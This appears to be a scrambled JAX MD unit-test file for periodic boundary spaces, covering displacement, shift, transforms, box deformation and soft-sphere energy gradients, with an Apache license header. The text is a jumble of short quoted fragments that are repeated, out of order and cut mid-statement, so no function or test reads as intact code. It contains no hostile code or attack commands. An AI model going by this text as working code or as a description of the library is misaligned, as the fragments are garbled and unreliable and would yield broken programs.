test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl()", "= [f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim,", "not use this file except in compliance with the License.", "dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct =", "you may not use this file except in compliance with", "space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g =", "random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype):", "= [f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in", "R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype))", "(N, dim), dtype=dtype) R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d))", "language governing permissions and # limitations under the License. \"\"\"Tests", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "= random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0", "jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "= jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct,", "grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "split2 = random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension),", "spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R)", "* random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R =", "config as jax_config from jax import random import jax.numpy as", "disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "#5849.') N = 16 R_f, R, box, (s, E), (s_gf,", "2019 Google LLC # # Licensed under the Apache License,", "box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N =", "2): for k in range(-1, 2): dR_shifted = dR +", "== 3: for i in range(-1, 2): for j in", "split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R = R", "spatial_dimension == 2: for i in range(-1, 2): for j", "dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted <", "dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped,", "dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box,", "= jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix': box", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension,", "for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0)", "import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging()", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R),", "fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype)", "jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0),", "box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N =", "'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension,", "jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix': box =", "3: for i in range(-1, 2): for j in range(-1,", "dtype, box_format): N = 16 R_f, R, box, (s, E),", "random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 =", "FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS", "R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal(", "dtype, box_format): if box_format == 'scalar': raise SkipTest('Scalar case fails", "if dtype is f32: tol = 1e-5 for _ in", "dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct =", "= grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert", "at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "from absl.testing import parameterized from jax.config import config as jax_config", "dim, 'dtype': dtype } for dim in SPATIAL_DIMENSION for dtype", "from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS =", "- R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( {", "max_box_size = f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,),", "random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension,", "grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype,", "https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf, s_gf =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def", "file except in compliance with the License. # You may", "== 2: for i in range(-1, 2): for j in", "space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled,", "= random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R", "tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2", "R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) =", "R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "= dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted)", "assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "'dtype': dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION for", "range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key, 4) max_box_size =", "for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key =", "jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( {", "split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T", "random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49,", "for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N", "< 1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift", "dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "= space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn =", "dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key", "dtype) d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else", "in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale,", "grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1", "0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR)", "= random.split(key, 3) key, split_t, split_R, split_dR = random.split(key, 4)", "KIND, either express or implied. # See the License for", "self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dR) dR_direct = dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct,", "dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct)", "= jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(", "= random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self,", "(the \"License\"); # you may not use this file except", "dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted", "'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format } for dim in", "d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f =", "= 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION =", "shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R,", "tol = 1e-13 if dtype is f32: tol = 2e-5", "dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0) assert", "is f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key,", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype):", "for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key", "displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement", "jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert", "# # Unless required by applicable law or agreed to", "= random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R)", "space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda", "dr_direct.shape + (1,)) if spatial_dimension == 2: for i in", "spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv", "T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki',", "def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "dtype, box_format) deformed_box = box * 0.9 R_new = s_g(R,", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self,", "implied. # See the License for the specific language governing", "E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "= jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s,", "R, dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0)", "for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N", "BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32,", "0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1", "R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension,", "energy from jax_md.util import * from functools import partial from", "s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new,", "Copyright 2019 Google LLC # # Licensed under the Apache", "== dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim", "dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol =", "grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT", "box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if box_format", "= lambda R: jnp.sum(R ** 2) energy_indirect = lambda T,", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box =", "R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR)", "pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye =", "Unless required by applicable law or agreed to in writing,", "= space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf, s_gf", "range(-1, 2): for k in range(-1, 2): dR_shifted = dR", "the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "{ 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for", "the specific language governing permissions and # limitations under the", "random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R", "jnp from jax import grad, jit, jacfwd from jax import", "_ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R", "in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16", "def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key =", "import * from functools import partial from unittest import SkipTest", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension,", "} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def", "space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim),", "space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for _ in", "4) max_box_size = f32(10.0) box_size = max_box_size * random.uniform( split1,", "2: for i in range(-1, 2): for j in range(-1,", "dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R))", "* box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format ==", "= partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R", "random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R,", "R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension))", "POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype", "'_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self,", "dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "_ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric", "dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format", "return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__ == '__main__': absltest.main()", "in range(-1, 2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype)", "POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N,", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R),", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f,", "import space, test_util, quantity, energy from jax_md.util import * from", "5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES", "space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(", "POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye =", "jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format", "split_R, split_T = random.split(key, 3) dT = random.normal( split_T, (spatial_dimension,", "box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim)", "= s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new))", "from jax_md.util import * from functools import partial from unittest", "true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn)", "R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f))", "= space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift", "= jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3:", "dtype is f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES):", "self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "split = random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "* (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn,", "< -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert", "for j in range(-1, 2): dR_shifted = dR + jnp.array([i,", "spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype)", "box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box))", "You may obtain a copy of the License at #", "jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype", "== 'scalar': raise SkipTest('Scalar case fails due to JAX Issue", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format):", "def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f,", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9 R_new", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( {", "(1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct =", "(spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime", "R) ** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) **", "(1,)) if spatial_dimension == 2: for i in range(-1, 2):", "R_scaled = R * box_size dR = random.normal( split3, (PARTICLE_COUNT,", "split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0),", "spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform)", "= s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( {", "= dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape +", "test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "from jax import test_util as jtu from jax_md import space,", "jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10", "jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E), (s_gf, E_gf), (s_g,", "dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if", "jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted,", "self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0)", "= random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R *", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2:", "dtype): key = random.PRNGKey(0) tol = 1e-13 if dtype is", "'spatial_dimension': dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION for", "(s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): #", "displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement)", "random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R * box_size", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype):", "assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift", "License. # You may obtain a copy of the License", "self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in", "grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn", "dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1", "= jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1 = 10.0", "* box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn,", "jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for", "} for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key =", "= jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list(", "= random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric", "spatial_dimension), dtype=dtype) T = eye + dT + jnp.transpose(dT) R", "[f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in BOX_FORMATS", "s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key =", "R displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False)", "R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \\", "k in range(-1, 2): dR_shifted = dR + jnp.array([i, j,", "true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key", "from jax.config import config as jax_config from jax import random", "(spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1),", "= space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype ==", "R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled,", "> 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for", "= random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key)", "grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype,", "POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol =", "space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box):", "-0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype", "** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2))", "size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 *", "assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "split1, 